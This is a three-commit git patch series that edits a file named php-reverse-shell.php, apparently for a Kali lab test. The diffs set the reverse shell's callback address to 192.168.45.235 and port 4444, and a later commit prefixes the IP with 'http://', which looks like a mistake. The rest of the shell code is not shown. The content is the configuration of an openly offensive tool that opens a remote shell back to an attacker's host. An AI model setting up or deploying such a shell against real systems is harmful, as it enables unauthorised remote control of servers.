From 21982f72f0a23619517b0cf23d3020f9c7938dd8 Mon Sep 17 00:00:00 2001 From: BellyBear Date: Wed, 16 Oct 2024 01:38:10 +0900 Subject: [PATCH 1/3] Update php-reverse-shell.php kali test --- php-reverse-shell.php | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/php-reverse-shell.php b/php-reverse-shell.php index 2503b71..4457a7e 100755 --- a/php-reverse-shell.php +++ b/php-reverse-shell.php @@ -46,8 +46,8 @@ set_time_limit (0); $VERSION = "1.0"; -$ip = '127.0.0.1'; // CHANGE THIS -$port = 1234; // CHANGE THIS +$ip = '192.168.45.235'; // CHANGE THIS +$port = 4444; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; From ed340b6201753c216dfa074ee92867b636aabcc2 Mon Sep 17 00:00:00 2001 From: BellyBear Date: Wed, 16 Oct 2024 02:12:11 +0900 Subject: [PATCH 2/3] Update php-reverse-shell.php From f998dcc52d4347bb0898c405b9810a04ce25a1c5 Mon Sep 17 00:00:00 2001 From: BellyBear Date: Wed, 16 Oct 2024 02:17:22 +0900 Subject: [PATCH 3/3] Update php-reverse-shell.php --- php-reverse-shell.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/php-reverse-shell.php b/php-reverse-shell.php index 4457a7e..9aada2a 100755 --- a/php-reverse-shell.php +++ b/php-reverse-shell.php @@ -46,7 +46,7 @@ set_time_limit (0); $VERSION = "1.0"; -$ip = '192.168.45.235'; // CHANGE THIS +$ip = 'http://192.168.45.235'; // CHANGE THIS $port = 4444; // CHANGE THIS $chunk_size = 1400; $write_a = null;